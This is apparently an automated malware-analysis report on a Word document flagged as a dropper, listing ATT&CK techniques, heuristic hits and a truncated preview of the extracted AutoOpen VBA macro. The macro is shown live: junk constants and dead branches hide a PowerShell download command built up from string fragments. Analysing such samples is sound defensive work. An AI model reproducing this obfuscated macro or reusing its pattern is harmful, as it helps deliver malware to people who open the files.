Verdict: MALICIOUS
Risk Score: 350
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscation techniques and calls to `Shell()` and `CreateObject()` to likely download and execute a second-stage payload. The heuristic `OLE_VBA_SPLIT_KEYWORD_OBFUSCATION` specifically indicates the reassembly of dangerous API names, such as 'scripting.filesystemobject', which is a strong indicator of malicious intent.
Heuristics (10)
- ClamAV: Doc.Dropper.Agent-7119420-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7119420-0
- VBA macros detected (medium; OLE_VBA_MACROS; 6 related findings): Document contains VBA macro code
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA
- Dangerous API name reassembled from split string literals (critical; OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low; OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: bf12cffe3511c90aeb6856fd85e13352d8be8043a73229f02215bb2f51026206) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 248096 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Function heer()
heer = "iwefwfnwoiun"
MsgBox wiefu
End Function
Sub AutoOpen()
Const ih_lagw = True
Const txhtbbscl = False
Const vhadxrjmg = True
Const afalj = False
Const k_oyvo = False
Const ioih_ffxk0 = True
Const avqsa = False
Const c_vpyfg = False
Select Case "uuje"
Case "uuje"
amsoi = "$abgomyxwvevfsrlo"
End Select
Const hpf_ue = True
Select Case 87 + 41
Case edtquf
Const oyozdxho63 = True
Case 128
rruza = "c_asnivm='.Dow"
Const skgqsinfi = True
Const cintw = True
amsoi = mqml_yoiugv + amsoi + rruza
Case kymmwpiy
Const jvsgcljb = True
Const cmgbckd = True
Const oiudce = False
Const zcu_ezc = False
Const bisiemg = False
End Select
If 1798 <= 1948 Then
amsoi = amsoi + "n';$kceicqujfcyxzeofoiwrfwoe='em';$auyearkz_mpgdk_"
ElseIf 10 - 50 = 60 Then
Const xpfueo = False
Const bprnyii = True
Const ezggafv = True
Const unpeqbd = True
Const yyroo = False
Const cifnog = True
Else
End If
Select Case 47 + 12
Case 59
iylkvho = "oo_bx_jg"
Const uydzie = False
amsoi = ofcyfovc_ofd + amsoi + iylkvho + cajcvrl
End Select
If 4758 <= 3797 Then
Const ouifno = True
Const jjrswye = False
Const eeua6 = False
Const tueucs = False
ElseIf 88 - 45 = 43 Then
znmvgrm = "kkvdunluzouoxg_aqjrd='"
amsoi = zgeuwa + amsoi + znmvgrm + untcdtackcxp
Else
Const mweuhvy = True
Const jbycyfs = False
Const ncdxu_gc = True
Const ieuae22 = True
Const wuyksf4 = True
Const iifl = False
Const yaxnx = False
Const a_ozta = True
End If
Const ao_jml = False
Const sicthyv = True
Select Case 98 + 45
Case 143
uiey_gfbc0 = aobday + amsoi
Const ebcvre = True
yiyiuld = "imzw';$uyorw_unebxvmip"
uiey_gfbc0 = uiey_gfbc0 + yiyiuld
Case ipuuge
Const luogs = True
Const yjebk8 = True
End Select
Const xsrdxyn = False
Const f_zut_tp = True
Select Case 81 + 89
Case 6853
Const kzdvbraa1 = True
Const eaptaydn = True
Case 170
rlieburw = "gbksiiadwvdetnyh_i_s='"
uiey_gfbc0 = uiey_gfbc0 + rlieburw + kfoheea_u
End Select
If 94 - 66 = 28 Then
xwlbkioyiqb = "(1){';$epwegiuygvan"
uiey_gfbc0 = uiey_gfbc0 + xwlbkioyiqb
ElseIf 100 * 83 = 781 Then
Else
Const tiuyo2 = True
Const meokyt = True
Const jctbyl = True
Const gdgnohm = True
Const aasstqo = False
End If
Const slvplef = True
Select Case "l_wlkgas"
Case "l_wlkgas"
wylpe = "lbxqip='19/7';$nuwarvqzcaek"
uiey_gfbc0 = lo_qrpvol + uiey_gfbc0 + wylpe
End Select
Const ayuctrctk = False
Const b_i_ojzqi = True
If 8891 >= 4932 Then
ncccflwt = "vkvinrngskut_eiqjhckxcqx='Byp"
uiey_gfbc0 = beae + uiey_gfbc0 + ncccflwt
End If
Const ydom = False
Const pdmbi_iolt = False
Select Case "uias"
Case evkrbtez
Const glgxgct_kv = True
Const uuplpgy = True
Case "uias"
yzeuu = "as';$npqcuf_fosds"
Const driy_yi = False
uiey_gfbc0 = yuaafrqx23 + uiey_gfbc0 + yzeuu
Case uriollz
Const qyt_hv = True
Const qiargqhk = True
End Select
If 9718 >= 6536 Then
rtfwndh = "ve_rzywa"
uiey_gfbc0 = cifoozm + uiey_gfbc0 + rtfwndh
ElseIf 86 - 42 = 128 Then
Const oqqkr_ra = False
Const yiaytp8 = True
Const j_ayzny = False
Const knggyuo = False
Const oimnet = True
Else
End If
If 8963 <= 13624 Then
etezshmkq_p = "_w"
uiey_gfbc0 = n_iqzygv + uiey_gfbc0 + etezshmkq_p + iztyxb
End If
Const smyvkdmbqa = True
Select Case 29 + 42
Case 71
uafhaq = axxnse + uiey_gfbc0
Const ikepuu = True
Const oeui_tsu = False
oeslmtkrbb = "gcupi='Syste';$at"
uafhaq = uafhaq + oeslmtkrbb
End Select
Const onsxlf_zba = True
Const zdgheovjw = False
If 6614 >= 5490 Then
nlqyo27 = Environ("SystemRoot")
End If
Const vqgpucni = True
Select Case "sytqyggj"
Case "sytqyggj"
espivao = "ex_sxyttmsbpr"
Const ufjyjl = True
Const ea_xjlwhpt = True
uafhaq = fdhyk + uafhaq + espivao + fz_edzuy_xyqr
End Select
Const ey_uibe = F
... (truncated)